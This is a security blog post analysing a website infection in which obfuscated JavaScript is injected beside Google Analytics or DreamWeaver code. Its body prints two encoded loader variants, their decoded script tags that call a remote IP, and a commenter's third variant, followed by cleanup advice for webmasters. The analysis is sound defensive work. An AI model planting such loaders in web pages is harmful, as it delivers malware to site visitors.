Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Malicious “Stats” from

   02 Apr 09   Filed in Website exploits

This is a post about this week’s prevalent website infection. There are quite a few modifications but they all link to the same IP-address: 84 .244 .138 .55 and if Google detects the malicious scripts it blacklists infected sites reporting that “Malicious software is hosted on 1 domain(s), including

I’ve seen two modification of the malicious script:

var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iyyq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?";
var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.w rite(result);

(all scripts are slightly changed to make them less harmfull if you paste them somewhere)

This modification can be usually found attached to the existing Google Analytics script block. This way hackers try to make it less prominent. Some webmasters may even think it’s a part of a legitimate Google’s code. It is not.

When this code is executed (every time a visitor opens a web page in a browser), it creates the following script

<s cript type="text/javascript" src="http://84. 244.138 .55/ google-analytics/ga.js"></script>

The script uses Google Analytics-like names to make it look like a legitimate script if someone managed to decode it. Don’t be fooled.

Sometimes this script is injected in a separate script block at the end of HTML code.

The second modification looks different but under the hood it’s almost the same:

var s="",i,c=0,o="";str="60|115|99|114|105|112|116|32|116|121|112|101|61|34|116|101|120|116|47|106|97|118|97|115|99|114|105|112|116|34|32|115|114|99|61|34|104|116|116|112|59|47|47|56|52|45|50|52|52|46|49|51|56|46|53|53|47|115|116|97|116|115|47|115|116|97|116|46|106|115|34|62|60|47|115|99|114|105|112|116|62|";
document.w rite(o);

When it is executed it creates the following script

I found this script attached at the end of a standard DreamWeaver script block with MM_preloadImages, MM_swapImage, etc. functions.

<s cript type="text/javascript" src="http://84 .244.138. 55/stats/stat.js"></script>

Resolving the issue

If you are a webmaster or an owner of such a compromised site you would definitely want to know how to resolve the issue and make sure it won’t happen to your site again.

As an external researcher, I don’t have enough information to come up with a 100% reliable recipe. However, I had a few conversations with webmasters of compromised sites and have a strong feeling that this exploit has to do with compromised passwords.

  • Start with scanning your local computers (that you and your staff use to access your web server) for spyware. Especially Windows computers.
  • Change all site passwords (FTP, control panel, DB, etc.) – this is the most important step. The new passwords should be strong and hard to guess.
  • Keep the new passwords in a secure place. Don’t store them in plain text on the same computer. Don’t save them inside programs that you use to upload files to a web server (especially DreamWeaver). Malicious programs know how to extract passwords from popular FTP and web design programs’ settings.
  • Remove the malicious code from files on server. The easiest way to do it is upload a clean copy from a backup.
  • If your site was blacklisted by Google, request a review via Webmaster Tools.

Hope this information helps. If you have anything to add, share your thoughts or ask questions in the comments below.

Similar posts:

Reader's Comments (2)

  1. |

    This is the code as it put below the tag:

    /*@cc_on @*/
    /*@if (@_win32)
    var source =”=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00;6/23:/255/33:0hfpwj{ju0tubut/kt#?=0tdsjqu?”; var result = “”;
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    /*@end @*/

  2. |

    Thank you, thank you, you’ve saved my behind.